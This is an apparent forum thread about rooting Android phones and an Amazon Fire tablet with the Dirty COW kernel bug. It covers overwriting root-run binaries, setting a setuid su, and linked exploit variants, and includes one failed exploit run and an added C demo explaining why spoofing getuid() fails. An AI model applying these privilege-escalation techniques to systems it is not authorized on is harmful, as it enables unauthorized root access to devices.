This exploit only allows you to replace the content of existing files, keeping their existing mode/permissions, and the way su operates you need the setuid (set-user-ID) bit set in the mode. From a brief look at the system I wanted to get root on, Android doesn't seem to have any setuid binaries.
I'm thinking replacing something like wpa_supplicant could let us execute the payload as root, just disable and re-enable wifi, but I can't seem to get the exploit itself to work at the moment.
On further inspection (at least on this device), wpa_supplicant isn't readable by non-root (which I think the exploit requires). app_process is, but that's an executable I'd prefer not to mess with
Update:
Got the exploit itself working.
Tried replacing /system/bin/fsck_msdos's content to trigger it to be run as root by inserting a microSD card,
but something on this device (Amazon Fire 5th gen) keeps rebooting and restoring the system partition if any file is changed.
a___ said:
This exploit only allows you to replace the content of existing files
Not true. This code executes su as root, spawning a root shell. It can be modified to run a script that installs su in /system etc.
The downside is that the kernel crashes/freezes after some seconds.
https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2
I'd like to port that to an apk using the ndk, but my pc is too old.
The /system partition is mounted read-only by default. Because of this, you can't overwrite files on it. But I saw an exploit which used /sys/kernel/uevent_helper to execute a shell script as root. This would probably also work with the Dirty Cow exploit.
KillahKiwi said:
Doesn't that mean you can install a custom su binary and just execute that as any user?
You can't create a new file. You can modify an existing file. The su binary needs the setuid bit and there are no files in the Android filesystem with that bit set.
The only way to root a phone with this bug is to modify an executable that will change the owner of the su binary to root and set the setuid bit on this file. This part is trivial and very easy.
The difficult part is to find a binary that will be executed as root after you have booted. If somebody knows any file in /system/bin for example that will be executed as root doing some action on the phone tell me and the phone will be rooted in seconds.
---------- Post added at 11:32 AM ---------- Previous post was at 11:28 AM ----------
a___ said:
Got the exploit itself working.
Tried replacing /system/bin/fsck_msdos's content to trigger it to be run as root by inserting a microSD card,
but something on this device (Amazon Fire 5th gen) keeps rebooting and restoring the system partition if any file is changed.
I copied the su binary into /data/local/tmp. I can modify files in /system/bin for example and the phone does not reboot, but I don't have fsck_msdos on my phone.
---------- Post added at 11:35 AM ---------- Previous post was at 11:32 AM ----------
DP FH said:
Not true. This code executes su as root, spawning a root shell. It can be modified to run a script that installs su in /system etc.
The downside is that the kernel crashes/freezes after some seconds.
https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2
I'd like to port that to an apk using the ndk, but my pc is too old.
I'm compiling on the phone using UXTerm, then apt install clang, and then using gcc. It's the quickest way to compile a single .c file on it.
Scorpius666 said:
... It's the quickest way to compile a single .c file on it.
I'd like to create a standard Android app that uses jni to run exploit and then roots the device. I can't test on my real phone because I need warranty and Knox counter to 0.
DP FH said:
Not true. This code executes su as root, spawning a root shell. It can be modified to run a script that installs su in /system etc.
The downside is that the kernel crashes/freezes after some seconds.
https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2
I'd like to port that to an apk using the ndk, but my pc is too old.
On the first try it doesn't work for me:
Code:
[email protected]:/data/local/tmp $ ./dirtyc0w-mem b6dc0000 b6dc1000
[*] range: b6dc0000-b6dc1000]
[*] getuid = b6f79b18
[*] mmap 0xb6dd5000
[*] exploiting (patch)
./dirtyc0w-mem: failed to execute "su": Permission denied
[*] exploiting (unpatch)
[*] unpatched: uid=2000 (madviseThread)
[*] unpatched: uid=2000 (procselfmemThread)
But I'll modify a little bit to see if I can get it to work.
Scorpius666 said:
doesn't work for me.
I don't think you have su on the phone ????
By the way I'm trying to install some emulator on my pc so I can try
DP FH said:
I don't think you have su on the phone ????
By the way I'm trying to install some emulator on my pc so I can try
I do have su, in /data/local/tmp, with user permissions. The idea is to do a chown root:root and a chmod 4755.
But I know what the problem is. The SHELLCODE in the file is for x86, which seems to be an XOR AX, AX and a RET. I have to do the same for ARMv7l in Thumb, I think...
DP FH said:
Not true. This code executes su as root, spawning a root shell. It can be modified to run a script that installs su in /system etc.
The downside is that the kernel crashes/freezes after some seconds.
<URL>
I'd like to port that to an apk using the ndk, but my pc is too old.
Well, that assumes we already have a setuid su; this variant of the exploit won't help us.
julianwi said:
The /system partition is mounted read only by default. Because of this, you can't overwrite them. But I saw a exploit which used /sys/kernel/uevent_helper to execute a shell script as root. This would probably also work with the dirty cow exploit.
Somehow it did manage to overwrite it, but maybe the reboot and reset are caused by it being read-only and not actually writing the changes to persistent storage.
Will look into /sys/kernel/uevent_helper though, thanks
Scorpius666 said:
...
I copied the su binary in /data/local/tmp. I can modify files in /system/bin for example and the phone does not reboot, but i don't have fsck_msdos in my phone.
...
Just about any would work. You probably have some other fsck or mkfs utility you could do it with; then trying to format an SD card should run mkfs.
a___ said:
Just about any would work, you probably have some other fsck or mkfs utility you could do it with, then trying to format an SD card should run mkfs
The thing is, none of my fsck* files are readable except by root, at least on my device. The exploit needs a readable file.
a___ said:
Well, that assumes we already have a setuid su; this variant of the exploit won't help us.
Nope. The su command is executed as root, and when you execute su as root it gives you a root shell. Try to execute sh instead of su.
DP FH said:
Nope. The su command is executed as root, and when you execute su as root it gives you a root shell. Try to execute sh instead of su.
No, it merely makes libc report that the user is root even though it isn't, it needs su to already have setuid to switch to the real root, and then running the shell. In this case (simplified) the exploit just bypasses the password prompt.
a___ said:
No, it merely makes libc report that the user is root even though it isn't, it needs su to already have setuid to switch to the real root, and then running the shell. In this case (simplified) the exploit just bypasses the password prompt.
I just noticed that. Using sh instead of su, dirtycow-mem works on the phone and it spawns a shell, but with the same privileges as the user that executed it. So it's useless, at least with that libc approach.
Scorpius666 said:
I just noticed that. Using sh instead of su, dirtycow-mem works on the phone and it spawns a shell, but with the same privileges as the user that executed it. So it's useless, at least with that libc approach.
Strange, on normal x86 it works like a charm, so something needs to be fixed.
DP FH said:
Strange, on normal x86 it works like a charm, so something needs to be fixed.
Of course it works on x86. If you read the code you'll see that it changes the getuid() function of libc (which is already loaded in memory) to return 0. The x86 su binary uses getuid() to decide whether it should ask for a password or not. Since getuid() is patched, it doesn't ask for a password and spawns a root shell.
So basically for dirtycow-mem to work you need:
A su binary with setuid root
That su binary should ask for a password
The Android su binary doesn't ask for a password and doesn't have the setuid root so this exploit won't work.
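The two posts above make the key point: patching libc's getuid() only changes what the process is told, not the credentials the kernel holds, so a root shell only appears when a setuid su is already there to perform the real switch. The following is an added example, not code from the thread or from the dirtycow-mem gist, that makes this concrete from an educator's stance. patched_getuid is a stand-in for a libc getuid() whose code has been overwritten to return 0 (an assumption that models the approach discussed, nothing is patched here); the other functions ask the kernel directly via a raw syscall, via /proc/self/status, and via setresuid(), and show that all three still see the unprivileged uid.

```c
/* Added example: why a spoofed libc getuid() does not make a process root.
 * Not part of the original thread. 'patched_getuid' models the overwritten
 * libc function; nothing in this program patches anything. Linux only. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/* Stand-in for a libc getuid() whose code now always returns 0. */
uid_t patched_getuid(void) { return 0; }

/* Ask the kernel directly, bypassing libc entirely. */
uid_t kernel_real_uid(void) { return (uid_t)syscall(SYS_getuid); }

/* Cross-check through procfs: the first field of the "Uid:" line is the
 * real uid as the kernel records it. Returns -1 if it cannot be read. */
long proc_status_real_uid(void)
{
    FILE *f = fopen("/proc/self/status", "r");
    if (!f) return -1;
    char line[256];
    long uid = -1;
    while (fgets(line, sizeof line, f)) {
        if (strncmp(line, "Uid:", 4) == 0) {
            if (sscanf(line + 4, "%ld", &uid) != 1) uid = -1;
            break;
        }
    }
    fclose(f);
    return uid;
}

/* Returns 1 if the patched libc answer disagrees with the kernel (the spoof
 * is hollow), 0 if the caller genuinely is root (then both report 0). */
int spoof_is_hollow(void)
{
    return patched_getuid() != kernel_real_uid();
}

/* What a credential switch actually sees: the kernel decides setresuid()
 * from the real credentials, so it fails with EPERM for a non-root caller
 * regardless of what libc's getuid() claims. Returns 1 if the switch to
 * uid 0 was allowed, 0 on EPERM, -1 on any other error. */
int privileged_switch_allowed(void)
{
    if (setresuid(0, 0, 0) == 0) return 1;
    return errno == EPERM ? 0 : -1;
}

int main(void)
{
    printf("patched libc getuid()   : %u\n", (unsigned)patched_getuid());
    printf("raw getuid syscall      : %u\n", (unsigned)kernel_real_uid());
    printf("/proc/self/status Uid   : %ld\n", proc_status_real_uid());
    printf("spoof is hollow         : %d\n", spoof_is_hollow());
    printf("setresuid(0,0,0) allowed: %d\n", privileged_switch_allowed());
    return 0;
}
```

Run as an ordinary user, the first line prints 0 while the kernel-side checks print the real uid and setresuid() is refused; this is exactly the situation the posts describe, where an x86 su with the setuid bit would still do the real switch and merely skip its password prompt, while an Android su without that bit has nothing to switch to.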
Hey there,
Did anyone try the dirtycow-vdso exploit? It works on SELinux (which AOSP uses) and doesn't require a SUID binary; see
github . com/scumjr/dirtycow-vdso